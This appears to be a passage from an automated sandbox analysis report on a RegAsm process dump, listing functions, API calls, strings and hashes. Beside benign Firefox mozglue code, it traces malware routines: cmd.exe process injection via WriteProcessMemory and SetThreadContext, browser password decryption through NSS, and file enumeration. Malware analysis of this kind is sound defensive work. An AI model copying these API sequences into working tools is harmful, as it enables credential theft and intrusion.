Part of subcall function 6C0A5C50: GetTickCount64.KERNEL32 ref: 6C0A5D40
Part of subcall function 6C0A5C50: EnterCriticalSection.KERNEL32(6C10F688), ref: 6C0A5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C0CF0BE

Part of subcall function 6C0A5C50: __aulldiv.LIBCMT ref: 6C0A5DB4
Part of subcall function 6C0A5C50: LeaveCriticalSection.KERNEL32(6C10F688), ref: 6C0A5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0CF155
GetCurrentThreadId.KERNEL32 ref: 6C0CF1E0
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF1ED
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF212
GetCurrentThreadId.KERNEL32 ref: 6C0CF229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C0CF248
GetCurrentThreadId.KERNEL32 ref: 6C0CF2AE
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF2BB
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF2F8

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CF350
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF35D
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF381
GetCurrentThreadId.KERNEL32 ref: 6C0CF398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF3A0
GetCurrentThreadId.KERNEL32 ref: 6C0CF489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF491

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C0CF3CF

Part of subcall function 6C0CF070: GetCurrentThreadId.KERNEL32 ref: 6C0CF440
Part of subcall function 6C0CF070: AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF44D
Part of subcall function 6C0CF070: ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C0CF4A8
GetCurrentThreadId.KERNEL32 ref: 6C0CF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF561
GetCurrentThreadId.KERNEL32 ref: 6C0CF577
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF585
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C0CF3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C0CF499
[I %d/%d] profiler_resume, xrefs: 6C0CF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C0CF56A

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: 9cd2382090f936526ad05b5f2a6d9a5302ea92b913c97ffd85e34b516fdc69a1
Instruction ID: 31551b0f2fc91bcabe3528d2a3dc99ef89e35022d27a8e1713f34c162dcea000
Opcode Fuzzy Hash: 9cd2382090f936526ad05b5f2a6d9a5302ea92b913c97ffd85e34b516fdc69a1
Instruction Fuzzy Hash: 9ED1D2317042049FDB00AF68D4497AEBBF8EB46328F14061EED6593B80DF755809D7AB

Function 6C0964C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C0964DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C0964F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C096505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C096518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C09652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C09671C
GetCurrentProcess.KERNEL32 ref: 6C096724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C09672F
GetCurrentProcess.KERNEL32 ref: 6C096759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C096764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C096A80
GetSystemInfo.KERNEL32(?), ref: 6C096ABE
__Init_thread_footer.LIBCMT ref: 6C096AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C096AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C096AF7

Strings

nvdxgiwrap.dll, xrefs: 6C096513
_etoured.dll, xrefs: 6C0964ED
nvd3d9wrap.dll, xrefs: 6C096500
user32.dll, xrefs: 6C096526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C096798
detoured.dll, xrefs: 6C0964DA

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 2c8ee0d3fa3a4a4b205851413e33d9adae7635523128f69f544f66f75dacd245
Instruction ID: 66a198171244461237e9318db5497b9d1c8007ed8d6321b7758d5f4cc399115d
Opcode Fuzzy Hash: 2c8ee0d3fa3a4a4b205851413e33d9adae7635523128f69f544f66f75dacd245
Instruction Fuzzy Hash: E9F1E470A052199FDB60CF64CD88BDAB7F4AF46318F1442D9E819E7681DB31AE84DF90

Function 00415B0B Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 179stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
HeapAlloc.KERNEL32(00000000), ref: 00415B37
wsprintfA.USER32 ref: 00415B50
FindFirstFileA.KERNEL32(?,?), ref: 00415B67
StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
wsprintfA.USER32 ref: 00415BC9

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A

FindNextFileA.KERNEL32(?,?), ref: 00415CD8
FindClose.KERNEL32(?), ref: 00415CEC
lstrcatA.KERNEL32(?), ref: 00415D1A
lstrcatA.KERNEL32(?), ref: 00415D2D
lstrlenA.KERNEL32(?), ref: 00415D39
lstrlenA.KERNEL32(?), ref: 00415D56

Strings

%s\*, xrefs: 00415B4A
%s\%s, xrefs: 00415BC3
K_A, xrefs: 00415DE8

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*$K_A
API String ID: 2347508687-1624741228
Opcode ID: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction ID: f1f80ab8573884d5547ab2b117a2a7bfd804ed3709ed9bfee1ddc7f274e11282
Opcode Fuzzy Hash: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction Fuzzy Hash: 6F713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59

Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

UT, xrefs: 0041C79D
/, xrefs: 0041C525

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99

Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
ResumeThread.KERNEL32(?), ref: 0040F608
WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
ResumeThread.KERNEL32(?), ref: 0040F69F

Strings

a-A, xrefs: 0040F550, 0040F620
C:\Windows\System32\cmd.exe, xrefs: 0040F59B

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: C:\Windows\System32\cmd.exe$a-A
API String ID: 3621800378-431432405
Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24

Function 6C0C7E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C0C7ECF, 6C0C8335
data, xrefs: 6C0C8280, 6C0C83E1
(pre-xul), xrefs: 6C0C7E88
schema, xrefs: 6C0C81E3, 6C0C8311

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 844636a834458fd381c0b1cb0c5fa84a57c84fd0307ecf38511013ef1b6a5991
Instruction ID: 089cc35b6ef2341ea5e07d938ac893c1b54db8c6be4eb0bd381b9da7fb74b51f
Opcode Fuzzy Hash: 844636a834458fd381c0b1cb0c5fa84a57c84fd0307ecf38511013ef1b6a5991
Instruction Fuzzy Hash: 30E161B1B043409BC710CF68884075BFBE9BF89718F14492DE899E7791DB74ED498B91

Function 6C0AD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD4F2
LeaveCriticalSection.KERNEL32(6C10E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD50B

Part of subcall function 6C08CFE0: EnterCriticalSection.KERNEL32(6C10E784), ref: 6C08CFF6
Part of subcall function 6C08CFE0: LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C08D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD52E
EnterCriticalSection.KERNEL32(6C10E7DC), ref: 6C0AD690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C0AD6A6
LeaveCriticalSection.KERNEL32(6C10E7DC), ref: 6C0AD712
LeaveCriticalSection.KERNEL32(6C10E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0BD1C5), ref: 6C0AD751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C0AD7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C0AD82C
<jemalloc>, xrefs: 6C0AD827

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 6575c041c40b97ae246b99c9f37c271b85d9c429583c97d43aca20f30a5e7cf9
Instruction ID: 72dceaab666bef34e91915aa9b02936803e2058fced3423fba54ed1d0698a547
Opcode Fuzzy Hash: 6575c041c40b97ae246b99c9f37c271b85d9c429583c97d43aca20f30a5e7cf9
Instruction Fuzzy Hash: 1891C671B047018FD718CFA9C09475AB7F1EF89314F54892EE99A87B92EB30E945CB81

Function 6C0E4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C0E4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0E4F2E
moz_xmalloc.MOZGLUE ref: 6C0E4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C0E4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0E52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0E52E6
Sleep.KERNEL32(00000010), ref: 6C0E5481
free.MOZGLUE(?), ref: 6C0E5498

Strings

(, xrefs: 6C0E5250

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: 2ff551156997eac2f5a5bddf67822dd60b43256fa65fc7a99e776d75a6cd2e5e
Instruction ID: 97b05cdfbfca3cee7c7ab69524fcf4e70ad1cdac02f145877fcb7701abd19e36
Opcode Fuzzy Hash: 2ff551156997eac2f5a5bddf67822dd60b43256fa65fc7a99e776d75a6cd2e5e
Instruction Fuzzy Hash: 81F1D271A18B408FC716CF39C85162BB7F5AFDA384F058B2EF856A7651DB31D8428B81

Function 6C097810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E744), ref: 6C097885
LeaveCriticalSection.KERNEL32(6C10E744), ref: 6C0978A5
EnterCriticalSection.KERNEL32(6C10E784), ref: 6C0978AD
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C0978CD
EnterCriticalSection.KERNEL32(6C10E7DC), ref: 6C0978D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0978E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C09795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0979BB
LeaveCriticalSection.KERNEL32(?), ref: 6C097BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C097C82
LeaveCriticalSection.KERNEL32(6C10E7DC), ref: 6C097CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C097DAF

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: 79f099a3cb6b06d76a6fe089e666fac4c748bc131d902c58303f3a150b9b9cd3
Instruction ID: 110bff5c52343aef5de07e5d014b590e6df30b75eb393064d6a265fe5d25b60e
Opcode Fuzzy Hash: 79f099a3cb6b06d76a6fe089e666fac4c748bc131d902c58303f3a150b9b9cd3
Instruction Fuzzy Hash: 71027271A0121A8FDB54CF19C984799B7F5FF88318F6592AAD809A7751DB30BE90CF80

Function 0040A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A815
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
_memmove.LIBCMT ref: 0040A8BB
lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
String ID:
API String ID: 4058207798-0
Opcode ID: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction ID: 7253553526a9c866879b9953ce513a4e0df9f59d016b35785d070f4f95aa81eb
Opcode Fuzzy Hash: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction Fuzzy Hash: 60315CB2D0421AAFDB10DB64DD849FAB7BCAF08345F5040BAF409E2240E7794A859F66

Function 6C0C5190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0C51DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0C529C
